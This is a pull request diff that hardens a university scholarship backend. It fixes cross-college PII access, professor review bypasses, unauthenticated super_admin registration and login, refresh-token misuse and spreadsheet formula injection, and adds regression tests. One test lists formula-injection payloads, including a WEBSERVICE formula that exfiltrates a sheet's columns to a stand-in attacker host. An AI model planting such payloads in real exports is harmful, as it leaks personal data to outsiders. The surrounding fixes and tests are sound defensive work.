### PR TITLE
Security hardening: fix 11 authorization & injection vulnerabilities

### DIFF
--- a/backend/app/api/v1/endpoints/applications.py
+++ b/backend/app/api/v1/endpoints/applications.py
@@ -1044,18 +1044,36 @@ async def get_application_document_file(
     if not application:
         raise HTTPException(status_code=404, detail="申請單不存在")
 
-    # Authorization: owner OR staff/admin/professor/college
+    # Authorization: owner, admin/super_admin/college, or a professor with an
+    # actual advising relationship to the student.
     from app.models.user import UserRole
 
     is_owner = application.user_id == current_user.id
-    is_staff = current_user.role in (
-        UserRole.admin,
-        UserRole.super_admin,
-        UserRole.professor,
-        UserRole.college,
-    )
-    if not is_owner and not is_staff:
-        raise HTTPException(status_code=403, detail="無權限")
+    if not is_owner:
+        if current_user.role in (UserRole.admin, UserRole.super_admin, UserRole.college):
+            pass  # staff can access any application document
+        elif current_user.role == UserRole.professor:
+            # SECURITY (#1081-F): a blanket professor-role allow let any professor
+            # download any student's application-document PDF. Require the same
+            # advising relationship the sibling files.py proxy enforces via
+            # can_access_student_data(..., "view_applications"). Queried explicitly
+            # (not via the lazy relationship) to stay async-safe.
+            from app.models.professor_student import ProfessorStudentRelationship
+
+            rel_stmt = (
+                select(ProfessorStudentRelationship.id)
+                .where(
+                    ProfessorStudentRelationship.professor_id == current_user.id,
+                    ProfessorStudentRelationship.student_id == application.user_id,
+                    ProfessorStudentRelationship.is_active.is_(True),
+                    ProfessorStudentRelationship.can_view_applications.is_(True),
+                )
+                .limit(1)
+            )
+            if (await db.execute(rel_stmt)).first() is None:
+                raise HTTPException(status_code=403, detail="無權限 - 與學生無指導關係")
+        else:
+            raise HTTPException(status_code=403, detail="無權限")
 
     if not application.application_document_url:
         raise HTTPException(status_code=404, detail="申請文件不存在")

--- a/backend/app/api/v1/endpoints/auth.py
+++ b/backend/app/api/v1/endpoints/auth.py
@@ -55,6 +55,14 @@ async def populate_college_info(user_data: UserResponse, db: AsyncSession, user:
 @rate_limit(requests=10, window_seconds=600)  # 10 registrations / 10 min per IP
 async def register(request: Request, user_data: UserCreate, db: AsyncSession = Depends(get_db)):
     """Register a new user"""
+    # SECURITY: This endpoint accepts an unauthenticated, client-settable `role`
+    # (including super_admin) and is a pre-SSO-migration leftover. Gate it behind
+    # mock SSO so it is unreachable (404) on staging/production where
+    # ENABLE_MOCK_SSO=false. Legitimate user creation goes through the
+    # admin-gated POST /users, and Portal SSO creates users directly via the ORM.
+    if not settings.enable_mock_sso:
+        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Not found")
+
     client_ip = _client_ip(request)
     try:
         auth_service = AuthService(db)
@@ -104,6 +112,13 @@ async def register(request: Request, user_data: UserCreate, db: AsyncSession = D
 @rate_limit(requests=20, window_seconds=300)  # 20 attempts / 5 min per IP — slows brute force
 async def login(request: Request, login_data: UserLogin, db: AsyncSession = Depends(get_db)):
     """Login user and return access token"""
+    # SECURITY: `authenticate_user` performs NO credential verification (UserLogin
+    # has no password field), so this endpoint mints a valid JWT for any known
+    # username. It is a pre-SSO-migration leftover; gate it behind mock SSO so it
+    # returns 404 on staging/production where ENABLE_MOCK_SSO=false.
+    if not settings.enable_mock_sso:
+        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Not found")
+
     client_ip = _client_ip(request)
     try:
         auth_service = AuthService(db)

--- a/backend/app/api/v1/endpoints/college_review/application_review.py
+++ b/backend/app/api/v1/endpoints/college_review/application_review.py
@@ -11,11 +11,13 @@ import logging
 from typing import Optional
 
 from fastapi import APIRouter, Depends, HTTPException, Query, Request, status
+from sqlalchemy import select
 from sqlalchemy.exc import DatabaseError
 from sqlalchemy.ext.asyncio import AsyncSession
 
 from app.core.security import require_college, require_roles
 from app.db.deps import get_db
+from app.models.application import Application
 
 # Note: CollegeReview model removed - replaced by unified ApplicationReview system
 # from app.models.college_review import CollegeReview
@@ -24,6 +26,7 @@ from app.schemas.college_review import StudentTermData
 from app.schemas.response import ApiResponse
 from app.services.college_review_service import CollegeReviewService, ReviewPermissionError
 from app.services.student_service import StudentService
+from app.utils.application_helpers import get_college_code_from_data
 from app.utils.pii_masking import mask_id_number
 
 from ._helpers import _check_academic_year_permission, _check_scholarship_permission
@@ -153,6 +156,33 @@ async def get_student_preview(
 
     try:
         logger.info(f"User {current_user.id} requesting preview for student {student_id}")
+
+        # SECURITY (#1081-E): the SIS lookup below returns a full per-term academic
+        # record for ANY student number. College users may only preview students who
+        # have an application belonging to their own college. Enforce that BEFORE the
+        # SIS call so this endpoint is neither a cross-college PII leak nor a
+        # student-existence oracle (return 404, not 403, on failure so an attacker
+        # cannot distinguish "no such student" from "not your college").
+        if current_user.role == UserRole.college:
+            college_code = (current_user.college_code or "").strip()
+            if not college_code:
+                raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail="使用者未綁定學院")
+
+            # Join via User.nycu_id (== the student number) so this stays portable
+            # across DB dialects; scope by the student's academy code in Python
+            # (the canonical accessor keeps key-alias handling in one place).
+            app_rows = (
+                await db.execute(
+                    select(Application.student_data)
+                    .join(User, User.id == Application.user_id)
+                    .where(User.nycu_id == student_id)
+                )
+            ).all()
+            has_college_application = any(
+                sd and (get_college_code_from_data(sd) or "").strip() == college_code for (sd,) in app_rows
+            )
+            if not has_college_application:
+                raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f"Student {student_id} not found")
 
         # Initialize student service
         student_service = StudentService()

--- a/backend/app/api/v1/endpoints/college_review/distribution.py
+++ b/backend/app/api/v1/endpoints/college_review/distribution.py
@@ -33,7 +33,7 @@ from app.services.college_review_service import (
     CollegeReviewService,
 )
 
-from ._helpers import normalize_semester_value
+from ._helpers import assert_can_manage_ranking, normalize_semester_value
 
 logger = logging.getLogger(__name__)
 
@@ -88,11 +88,26 @@ async def get_ranking_roster_status(
     查詢排名的造冊狀態和進展
     """
     try:
+        # SECURITY (#1081-D): same missing-scope root cause as distribution-details.
+        # Load the ranking's owning college_code and authorize before returning its
+        # roster metadata, so a college can't read another college's ranking by id.
+        ranking_stmt = (
+            select(CollegeRanking)
+            .options(load_only(CollegeRanking.id, CollegeRanking.college_code))
+            .where(CollegeRanking.id == ranking_id)
+        )
+        ranking = (await db.execute(ranking_stmt)).scalar_one_or_none()
+        if not ranking:
+            raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Ranking not found")
+        assert_can_manage_ranking(ranking, current_user)
+
         service = CollegeReviewService(db)
         roster_status = await service.check_ranking_roster_status(ranking_id)
 
         return ApiResponse(success=True, message="Roster status retrieved successfully", data=roster_status)
 
+    except HTTPException:
+        raise
     except Exception as e:
         logger.exception(f"Error retrieving roster status for ranking {ranking_id}")
         raise HTTPException(
@@ -130,6 +145,12 @@ async def get_distribution_details(
 
         if not ranking:
             raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Ranking not found")
+
+        # SECURITY (#1081-C): rankings are single-college and this response carries
+        # applicant PII, ranks and rejection reasons. Without scoping, a College-A
+        # account could read College-B's data by enumerating ranking_id. Mirror the
+        # sibling ranking_management.py::get_ranking check.
+        assert_can_manage_ranking(ranking, current_user)
 
         sub_type_metadata_map: Dict[str, Dict[str, str]] = {}
         if ranking.scholarship_type and getattr(ranking.scholarship_type, "sub_type_configs", None):

--- a/backend/app/api/v1/endpoints/college_review/distribution.py
+++ b/backend/app/api/v1/endpoints/college_review/distribution.py
@@ -40,6 +40,23 @@ logger = logging.getLogger(__name__)
 router = APIRouter()
 
 
+def _assert_ranking_visible_or_404(ranking, current_user: User) -> None:
+    """Authorize ranking access for read endpoints, translating a cross-college
+    403 into a 404.
+
+    ``assert_can_manage_ranking`` raises 403 for a college that doesn't own the
+    ranking. On these read-by-id endpoints that turns the endpoint into an
+    enumeration oracle (403 = "exists but not your college" vs 404 = "no such
+    ranking"). Collapsing both to 404 removes that signal (#1081-C/D).
+    """
+    try:
+        assert_can_manage_ranking(ranking, current_user)
+    except HTTPException as exc:
+        if exc.status_code == status.HTTP_403_FORBIDDEN:
+            raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Ranking not found") from exc
+        raise
+
+
 @router.get("/quota-status")
 async def get_quota_status(
     scholarship_type_id: int = Query(..., description="Scholarship type ID"),
@@ -99,7 +116,7 @@ async def get_ranking_roster_status(
         ranking = (await db.execute(ranking_stmt)).scalar_one_or_none()
         if not ranking:
             raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Ranking not found")
-        assert_can_manage_ranking(ranking, current_user)
+        _assert_ranking_visible_or_404(ranking, current_user)
 
         service = CollegeReviewService(db)
         roster_status = await service.check_ranking_roster_status(ranking_id)
@@ -148,9 +165,9 @@ async def get_distribution_details(
 
         # SECURITY (#1081-C): rankings are single-college and this response carries
         # applicant PII, ranks and rejection reasons. Without scoping, a College-A
-        # account could read College-B's data by enumerating ranking_id. Mirror the
-        # sibling ranking_management.py::get_ranking check.
-        assert_can_manage_ranking(ranking, current_user)
+        # account could read College-B's data by enumerating ranking_id. Cross-college
+        # access collapses to 404 (not 403) so it isn't an existence oracle.
+        _assert_ranking_visible_or_404(ranking, current_user)
 
         sub_type_metadata_map: Dict[str, Dict[str, str]] = {}
         if ranking.scholarship_type and getattr(ranking.scholarship_type, "sub_type_configs", None):

--- a/backend/app/api/v1/endpoints/college_review/ranking_management.py
+++ b/backend/app/api/v1/endpoints/college_review/ranking_management.py
@@ -1032,6 +1032,13 @@ async def import_ranking_from_excel(
         # Check permissions - the owning college's reviewers or an admin can import
         assert_can_manage_ranking(ranking, current_user)
 
+        # SECURITY (#1081-H): this is a ranking-mutation path (it reorders ranks and
+        # can flip college_rejected). Every sibling mutation blocks college users
+        # once the college-review deadline has passed; without this guard a college
+        # user could reorder / reject via import after the deadline. Admins bypass.
+        service = CollegeReviewService(db)
+        await service.assert_ranking_within_deadline_by_ranking(ranking_id, current_user)
+
         if ranking.is_finalized:
             raise HTTPException(status_code=status.HTTP_409_CONFLICT, detail="Cannot modify finalized ranking")
 
@@ -1166,6 +1173,10 @@ async def import_ranking_from_excel(
 
     except HTTPException:
         raise
+    except AuthorizationError as e:
+        raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=str(e)) from e
+    except NotFoundError as e:
+        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=str(e)) from e
     except Exception as e:
         logger.exception("Error importing ranking data")
         raise HTTPException(

--- a/backend/app/api/v1/endpoints/professor.py
+++ b/backend/app/api/v1/endpoints/professor.py
@@ -224,6 +224,7 @@ async def update_professor_review(
     logger.info(f"Professor {current_user.id} updating review {review_id} for application {application_id}")
 
     try:
+        service = ApplicationService(db)
         review_service = ReviewService(db)
 
         # Verify ownership of the review
@@ -238,6 +239,17 @@ async def update_professor_review(
         # Verify the review belongs to the specified application
         if existing_review.application_id != application_id:
             raise AuthorizationError("Review does not belong to the specified application")
+
+        # SECURITY (#1081-A): enforce the same terminal-reject lock + review-window
+        # guard used on submit. A professor full-reject sets application.status =
+        # rejected, which fails can_professor_submit_review; without this check a
+        # professor could edit their own terminal reject back to an approval.
+        from app.core.config import settings
+
+        if not settings.bypass_time_restrictions and not await service.can_professor_submit_review(
+            application_id, current_user.id
+        ):
+            raise AuthorizationError("Professor not authorized to update review at this time or for this application")
 
         # Block professor edits once the college has started reviewing (#64).
         await review_service.assert_professor_review_unlocked(application_id, current_user)

--- a/backend/app/api/v1/endpoints/reviews.py
+++ b/backend/app/api/v1/endpoints/reviews.py
@@ -15,6 +15,8 @@ from sqlalchemy.exc import DatabaseError, IntegrityError
 from sqlalchemy.ext.asyncio import AsyncSession
 from sqlalchemy.orm import joinedload
 
+from app.core.config import settings
+from app.core.exceptions import AuthorizationError, NotFoundError
 from app.core.security import get_current_user
 from app.db.deps import get_db
 from app.models.application import Application
@@ -24,6 +26,7 @@ from app.models.user import User
 from app.schemas.response import ApiResponse
 from app.schemas.review import ReviewCreate, ReviewItemResponse, ReviewResponse, ReviewSubmitRequest
 from app.services.application_audit_service import ApplicationAuditService
+from app.services.application_service import ApplicationService
 from app.services.review_service import ReviewService
 
 logger = logging.getLogger(__name__)
@@ -178,6 +181,13 @@ async def get_review(
     if not review:
         raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="審查記錄不存在")
 
+    # SECURITY (#1081-B): a single review carries the same evaluative content as the
+    # list endpoint. Scope by the parent application so review-id enumeration can't
+    # leak another applicant's reviewer identity / recommendation / comments.
+    viewable = await ApplicationService(db).get_viewable_application(review.application_id, current_user)
+    if not viewable:
+        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="審查記錄不存在")
+
     return {
         "success": True,
         "message": "審查記錄取得成功",
@@ -214,8 +224,11 @@ async def get_application_reviews(
     """
     取得申請的所有審查記錄
     """
-    # 檢查申請是否存在
-    application = await db.get(Application, application_id)
+    # SECURITY (#1081-B): review records carry reviewer identity, recommendations
+    # and free-text comments (required on reject). Scope reads to the application
+    # owner or staff with a legitimate relationship — otherwise any authenticated
+    # student could read another applicant's full evaluative trail by id.
+    application = await ApplicationService(db).get_viewable_application(application_id, current_user)
     if not application:
         raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="申請不存在")
 
@@ -276,8 +289,10 @@ async def get_application_review_status(
     """
     review_service = ReviewService(db)
 
-    # 檢查申請是否存在
-    application = await db.get(Application, application_id)
+    # SECURITY (#1081-B): this response exposes decision_reason, reviewer identity
+    # and review comments. Scope to the application owner or staff with a
+    # legitimate relationship, same as get_application_reviews.
+    application = await ApplicationService(db).get_viewable_application(application_id, current_user)
     if not application:
         raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="申請不存在")
 
@@ -438,6 +453,30 @@ async def submit_application_review(
         # Use unified ReviewService for creating/updating reviews
         review_service = ReviewService(db)
 
+        # SECURITY (#1081-A): professor callers on this multi-role endpoint must
+        # pass the same assignment + terminal-reject-lock + review-window checks
+        # that professor.py::submit_professor_review already enforces. Without
+        # them, any professor could reject/approve an application they aren't
+        # assigned to, or reverse their own terminal reject after the fact —
+        # defeating the "professor full-reject is terminal" policy. College /
+        # admin / super_admin keep the sub-type-based scoping applied below.
+        if current_user.is_professor():
+            app_service = ApplicationService(db)
+            professor_application = await app_service.get_application_by_id(application_id, current_user)
+            if not professor_application:
+                raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Application not found")
+
+            if not settings.bypass_time_restrictions and not await app_service.can_professor_submit_review(
+                application_id, current_user.id
+            ):
+                raise HTTPException(
+                    status_code=status.HTTP_403_FORBIDDEN,
+                    detail="Professor not authorized to submit review at this time or for this application",
+                )
+
+            # Block professor edits once the college has started reviewing (#64).
+            await review_service.assert_professor_review_unlocked(application_id, current_user)
+
         # Get reviewable sub-types for this user to validate permissions
         reviewable_subtypes = await review_service.get_reviewable_subtypes(application_id, current_user.role)
 
@@ -539,6 +578,11 @@ async def submit_application_review(
     except HTTPException:
         # Re-raise FastAPI HTTPException as-is (preserves status code and detail)
         raise
+    except AuthorizationError as e:
+        # Raised by assert_professor_review_unlocked when the professor lock is set.
+        raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=str(e)) from e
+    except NotFoundError as exc:
+        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Application not found") from exc
     except ValueError as e:
         logger.warning(f"Invalid review data for application {application_id}", exc_info=True)
         raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail="Invalid review data") from e

--- a/backend/app/api/v1/endpoints/reviews.py
+++ b/backend/app/api/v1/endpoints/reviews.py
@@ -462,7 +462,10 @@ async def submit_application_review(
         # admin / super_admin keep the sub-type-based scoping applied below.
         if current_user.is_professor():
             app_service = ApplicationService(db)
-            professor_application = await app_service.get_application_by_id(application_id, current_user)
+            # Raw-model existence/assignment check (returns None for a professor not
+            # assigned to this application) — lighter than get_application_by_id,
+            # which builds a full response payload and integrates file data.
+            professor_application = await app_service.get_viewable_application(application_id, current_user)
             if not professor_application:
                 raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Application not found")
 

--- a/backend/app/core/deps.py
+++ b/backend/app/core/deps.py
@@ -47,6 +47,10 @@ async def get_current_user(token: str = Depends(oauth2_scheme), db: AsyncSession
 
     try:
         payload = jwt.decode(token, settings.secret_key, algorithms=[settings.algorithm])
+        # SECURITY: reject refresh tokens where an access token is expected.
+        # Access tokens carry no `type` claim; refresh tokens set type="refresh".
+        if payload.get("type") == "refresh":
+            raise credentials_exception
         user_id: str = payload.get("sub")
         if user_id is None:
             raise credentials_exception

--- a/backend/app/core/security.py
+++ b/backend/app/core/security.py
@@ -68,6 +68,12 @@ async def get_current_user(
 
     try:
         payload = verify_token(credentials.credentials)
+        # SECURITY: reject refresh tokens (7-day expiry) where an access token is
+        # expected. Access tokens carry no `type` claim; refresh tokens set
+        # type="refresh". Without this check a refresh token would be accepted
+        # anywhere an access token is.
+        if payload.get("type") == "refresh":
+            raise AuthenticationError("Invalid token")
         user_id_str: str = payload.get("sub")
         if user_id_str is None:
             raise AuthenticationError("Invalid token")

--- a/backend/app/services/application_service.py
+++ b/backend/app/services/application_service.py
@@ -942,6 +942,20 @@ class ApplicationService:
 
         return application
 
+    async def get_viewable_application(self, application_id: int, current_user: User) -> Application | None:
+        """Return the raw Application only if ``current_user`` may view its review data.
+
+        Access rules (identical to ``_get_application_model``):
+        - student: only their own application (``user_id`` match)
+        - professor: only applications assigned to them (``professor_id`` match)
+        - college / admin / super_admin: any application
+
+        Returns ``None`` when the application does not exist OR the caller has no
+        legitimate relationship to it. Callers should treat ``None`` as 404 so the
+        two cases are indistinguishable to an enumerating attacker (#1081-B).
+        """
+        return await self._get_application_model(application_id, current_user)
+
     async def get_application_by_id(self, application_id: int, current_user: User):
         """Get application by ID with proper access control and formatted response"""
         # Use internal method to get the application model

--- a/backend/app/services/college_ranking_export_service.py
+++ b/backend/app/services/college_ranking_export_service.py
@@ -31,6 +31,7 @@ from reportlab.lib.units import mm
 from reportlab.platypus import KeepInFrame, Paragraph, SimpleDocTemplate, Spacer, Table, TableStyle
 
 from app.services.pdf_fonts import CJK_FONT_NAME, ensure_cjk_font
+from app.utils.excel_security import excel_safe_cell_value
 
 # Static columns shared by the xlsx and PDF exports: (header label, PDF column
 # weight). STATIC_HEADERS and the PDF weight vector are both derived from this one
@@ -124,7 +125,9 @@ class CollegeRankingExportService:
         for idx, row in enumerate(rows, start=1):
             excel_row = idx + 2  # +2 because rows 1-2 are title/header
             for col_idx, value in enumerate(self._row_cells(row, idx, sub_type_labels, sorted_dynamic), start=1):
-                ws.cell(row=excel_row, column=col_idx, value=value)
+                # SECURITY (#1081-G): free-text form fields flow into these cells;
+                # neutralize spreadsheet formula injection before writing.
+                ws.cell(row=excel_row, column=col_idx, value=excel_safe_cell_value(value))
 
         max_row = len(rows) + 2
         self._apply_borders(ws, max_row=max_row, max_col=total_cols)

--- a/backend/app/services/excel_export_service.py
+++ b/backend/app/services/excel_export_service.py
@@ -17,6 +17,7 @@ from openpyxl.utils import get_column_letter
 
 from app.core.config import settings
 from app.core.exceptions import FileStorageError
+from app.utils.excel_security import excel_safe_cell_value
 from app.models.payment_roster import (
     MANUAL_REMOVAL_PREFIXES,
     PaymentRoster,
@@ -777,7 +778,11 @@ class ExcelExportService:
             for row_idx, (row_data, fills) in enumerate(zip(excel_data, cell_fills, strict=True), start=start_row):
                 for col_idx, column_name in enumerate(columns, start=1):
                     value = row_data.get(column_name, "")
-                    cell = ws.cell(row=row_idx, column=col_idx, value=value)
+                    # SECURITY (#1081-G): roster rows carry student-influenced text
+                    # (name, address, remarks). Neutralize spreadsheet formula
+                    # injection; numeric values pass through unchanged so the
+                    # number_format below still applies.
+                    cell = ws.cell(row=row_idx, column=col_idx, value=excel_safe_cell_value(value))
 
                     if column_name in self.NUMERIC_FORMAT_COLUMNS and isinstance(value, (int, float)):
                         cell.number_format = "#,##0"
@@ -903,7 +908,8 @@ class ExcelExportService:
 
         for row_idx, (label, value) in enumerate(info_data, start=1):
             info_ws.cell(row=row_idx, column=1, value=label).font = Font(bold=True)
-            info_ws.cell(row=row_idx, column=2, value=value)
+            # SECURITY (#1081-G): defense-in-depth for any config-influenced label.
+            info_ws.cell(row=row_idx, column=2, value=excel_safe_cell_value(value))
 
         info_ws.column_dimensions["A"].width = 15
         info_ws.column_dimensions["B"].width = 20

--- a/backend/app/services/manual_distribution_service.py
+++ b/backend/app/services/manual_distribution_service.py
@@ -1503,6 +1503,21 @@ class ManualDistributionService:
             if ri.allocated_sub_type:
                 ri.is_allocated = True
 
+        # §10 quota gate (#1081-I): restoring re-consumes a quota slot, so it must
+        # run the same oversubscription check allocate() / finalize() do. Without
+        # it, revoke → reallocate the freed slot to someone else → restore can
+        # double-book a single slot with no DB-level guard. Resolve the round's
+        # config from the re-affirmed slot (fall back to the application's own
+        # config) and recount; a ValueError rolls the whole restore back.
+        requesting_config_id = next(
+            (ri.allocation_config_id for ri in ranking_items if ri.is_allocated and ri.allocation_config_id),
+            app.scholarship_configuration_id,
+        )
+        if requesting_config_id is not None:
+            requesting_config = await self.db.get(ScholarshipConfiguration, requesting_config_id)
+            if requesting_config is not None:
+                await self._assert_round_not_oversubscribed(requesting_config)
+
         # Audit logging moved to the endpoint (ApplicationAuditService.
         # log_application_restore) so the row carries the acting User +
         # request IP/UA and the action lives in the AuditAction enum (G18).

--- a/backend/app/services/roster_service.py
+++ b/backend/app/services/roster_service.py
@@ -2377,6 +2377,21 @@ class RosterService:
         if item.is_included:
             raise ConflictError("明細未被移除，無需回復")
 
+        # SECURITY (#1081-K): re-read the underlying application status before
+        # re-including. reconcile_roster's add path only (re)adds items whose
+        # application is still `approved`; restore had no such re-check, so an
+        # admin could restore a roster item whose application was withdrawn /
+        # rejected / revoked in the interim, silently inflating that student's
+        # received_months (which feeds the PhD 36-month cap).
+        from app.models.application import ApplicationStatus
+
+        application = item.application
+        if application is None or application.status != ApplicationStatus.approved:
+            current_status = getattr(getattr(application, "status", None), "value", None)
+            raise ValueError(
+                f"Application for item {item_id} is not approved " f"(status={current_status})；無法回復此明細"
+            )
+
         item.is_included = True
         item.exclusion_reason = None
         self.db.flush()

--- a/backend/app/services/whitelist_excel_service.py
+++ b/backend/app/services/whitelist_excel_service.py
@@ -10,6 +10,8 @@ from openpyxl import Workbook, load_workbook
 from openpyxl.styles import Alignment, Border, Font, PatternFill, Side
 from openpyxl.utils import get_column_letter
 
+from app.utils.excel_security import excel_safe_cell_value
+
 logger = logging.getLogger(__name__)
 
 
@@ -66,10 +68,12 @@ class WhitelistExcelService:
         row = 2
         for sub_type, students in whitelist_data.items():
             for student in students:
-                ws.cell(row=row, column=1).value = student.get("nycu_id", "")
-                ws.cell(row=row, column=2).value = student.get("name", "")
-                ws.cell(row=row, column=3).value = sub_type
-                ws.cell(row=row, column=4).value = student.get("note", "")
+                # SECURITY (#1081-G): nycu_id/name/note are user-influenced free
+                # text; neutralize spreadsheet formula injection before writing.
+                ws.cell(row=row, column=1).value = excel_safe_cell_value(student.get("nycu_id", ""))
+                ws.cell(row=row, column=2).value = excel_safe_cell_value(student.get("name", ""))
+                ws.cell(row=row, column=3).value = excel_safe_cell_value(sub_type)
+                ws.cell(row=row, column=4).value = excel_safe_cell_value(student.get("note", ""))
 
                 # 應用樣式
                 for col_idx in range(1, len(self.column_headers) + 1):
@@ -231,7 +235,8 @@ class WhitelistExcelService:
         for row_idx, data in enumerate(example_data, start=2):
             for col_idx, value in enumerate(data, start=1):
                 cell = ws.cell(row=row_idx, column=col_idx)
-                cell.value = value
+                # SECURITY (#1081-G): sub_type comes from admin config; guard it.
+                cell.value = excel_safe_cell_value(value)
                 cell.font = self.cell_font
                 cell.alignment = self.cell_alignment
                 cell.border = self.border

--- a/backend/app/tests/test_auth_login_register_gated.py
+++ b/backend/app/tests/test_auth_login_register_gated.py
@@ -1,0 +1,73 @@
+"""Regression tests for #1079.
+
+`POST /auth/register` accepted a client-supplied `role` (including super_admin)
+with no authentication, and `POST /auth/login` had no password field at all, so
+`authenticate_user` minted a valid JWT for any known username — two unauthenticated
+requests chained into full super_admin access.
+
+The fix gates both endpoints behind `settings.enable_mock_sso` (404 when disabled),
+matching the existing `/auth/mock-sso/*` and `/auth/dev-profiles/*` pattern.
+`ENABLE_MOCK_SSO=false` on staging/production closes the exploit while local
+dev/test (default True) keep working.
+"""
+
+import pytest
+from httpx import AsyncClient
+from sqlalchemy.ext.asyncio import AsyncSession
+
+from app.models.user import User, UserRole, UserType
+
+
+class TestAuthRegisterLoginGated:
+    async def test_register_returns_404_when_mock_sso_disabled(self, client: AsyncClient, monkeypatch):
+        from app.core import config
+
+        monkeypatch.setattr(config.settings, "enable_mock_sso", False)
+
+        resp = await client.post(
+            "/api/v1/auth/register",
+            json={"nycu_id": "attacker_001", "role": "super_admin"},
+        )
+        assert resp.status_code == 404
+
+    async def test_login_returns_404_when_mock_sso_disabled(self, client: AsyncClient, monkeypatch):
+        from app.core import config
+
+        monkeypatch.setattr(config.settings, "enable_mock_sso", False)
+
+        resp = await client.post("/api/v1/auth/login", json={"username": "admin"})
+        assert resp.status_code == 404
+
+    async def test_register_still_works_when_mock_sso_enabled(self, client: AsyncClient, monkeypatch):
+        """Local dev/test behavior is preserved (endpoint reachable when enabled)."""
+        from app.core import config
+
+        monkeypatch.setattr(config.settings, "enable_mock_sso", True)
+
+        resp = await client.post(
+            "/api/v1/auth/register",
+            json={"nycu_id": "reg_enabled_001", "name": "Reg Enabled"},
+        )
+        assert resp.status_code == 201
+        body = resp.json()
+        assert body["success"] is True
+        assert body["data"]["nycu_id"] == "reg_enabled_001"
+
+    async def test_login_still_works_when_mock_sso_enabled(self, client: AsyncClient, db: AsyncSession, monkeypatch):
+        from app.core import config
+
+        monkeypatch.setattr(config.settings, "enable_mock_sso", True)
+
+        user = User(
+            nycu_id="login_enabled_001",
+            name="Login Enabled",
+            email="login_enabled_001@nycu.edu.tw",
+            user_type=UserType.student,
+            role=UserRole.student,
+        )
+        db.add(user)
+        await db.commit()
+
+        resp = await client.post("/api/v1/auth/login", json={"username": "login_enabled_001"})
+        assert resp.status_code == 200
+        assert resp.json()["data"]["access_token"]

--- a/backend/app/tests/test_excel_formula_injection.py
+++ b/backend/app/tests/test_excel_formula_injection.py
@@ -1,0 +1,80 @@
+"""Regression tests for #1081-G (stored Excel/CSV formula injection).
+
+A student's free-text form-field value was written unescaped into the `.xlsx`
+exports reviewers download. openpyxl promotes a leading `=`/`+`/`-`/`@` to a live
+formula cell, so a payload like
+``=WEBSERVICE("https://attacker/x?d="&TEXTJOIN(",",TRUE,N:N))`` can reference the
+whole sheet's PII columns and exfiltrate them once a reviewer opens the file.
+
+`excel_safe_cell_value` apostrophe-prefixes any string starting with a formula
+trigger so the cell is treated as literal text.
+"""
+
+import io
+
+import pytest
+from openpyxl import Workbook, load_workbook
+
+from app.utils.excel_security import excel_safe_cell_value
+
+FORMULA_PAYLOADS = [
+    '=WEBSERVICE("https://attacker/x?d="&TEXTJOIN(",",TRUE,N:N))',
+    "=1+1",
+    "+1+1",
+    "-2+3",
+    "@SUM(A1:A9)",
+    "\t=cmd",
+    "\r=cmd",
+    "\n=cmd",
+]
+
+SAFE_VALUES = ["王小明", "310460031", "nctu@g2.nctu.edu.tw", "0912345678", ""]
+
+
+@pytest.mark.parametrize("payload", FORMULA_PAYLOADS)
+def test_formula_payloads_are_neutralized(payload):
+    out = excel_safe_cell_value(payload)
+    assert out.startswith("'"), f"{payload!r} was not prefixed"
+    assert out == "'" + payload
+
+
+@pytest.mark.parametrize("value", SAFE_VALUES)
+def test_safe_values_pass_through_unchanged(value):
+    assert excel_safe_cell_value(value) == value
+
+
+def test_non_string_values_pass_through_unchanged():
+    assert excel_safe_cell_value(5) == 5
+    assert excel_safe_cell_value(3.14) == 3.14
+    assert excel_safe_cell_value(None) is None
+
+
+def test_openpyxl_roundtrip_treats_sanitized_value_as_text_not_formula():
+    """Prove the guard actually changes openpyxl's cell data_type from 'f'
+    (formula) to 's' (string) for a real workbook round-trip."""
+    payload = '=WEBSERVICE("https://attacker/x")'
+
+    # Unsanitized: openpyxl records a live formula cell.
+    wb = Workbook()
+    ws = wb.active
+    ws.cell(row=1, column=1, value=payload)
+    buf = io.BytesIO()
+    wb.save(buf)
+    buf.seek(0)
+    reloaded = load_workbook(buf)
+    assert reloaded.active.cell(row=1, column=1).data_type == "f"
+
+    # Sanitized: literal string, not a formula.
+    wb2 = Workbook()
+    ws2 = wb2.active
+    ws2.cell(row=1, column=1, value=excel_safe_cell_value(payload))
+    buf2 = io.BytesIO()
+    wb2.save(buf2)
+    buf2.seek(0)
+    reloaded2 = load_workbook(buf2)
+    cell = reloaded2.active.cell(row=1, column=1)
+    # The critical property: it is a string cell ('s'), NOT a formula ('f').
+    assert cell.data_type == "s"
+    # openpyxl keeps the guarding apostrophe in the raw stored value; Excel/
+    # LibreOffice hide it in the UI and never evaluate the cell as a formula.
+    assert cell.value == "'" + payload

--- a/backend/app/tests/test_jwt_type_claim_rejected.py
+++ b/backend/app/tests/test_jwt_type_claim_rejected.py
@@ -1,0 +1,62 @@
+"""Regression tests for the JWT `type`-claim hardening from #1079.
+
+`verify_token` / `get_current_user` never checked the token `type`, so a refresh
+token (7-day expiry) would be accepted anywhere an access token is expected. Both
+`get_current_user` implementations (`app.core.security` and `app.core.deps`) now
+reject a token whose `type` claim is `refresh`.
+"""
+
+import pytest
+from fastapi import HTTPException
+from fastapi.security import HTTPAuthorizationCredentials
+from sqlalchemy.ext.asyncio import AsyncSession
+
+from app.core.deps import get_current_user as deps_get_current_user
+from app.core.exceptions import AuthenticationError
+from app.core.security import create_access_token, create_refresh_token
+from app.core.security import get_current_user as security_get_current_user
+from app.models.user import User, UserRole, UserType
+
+
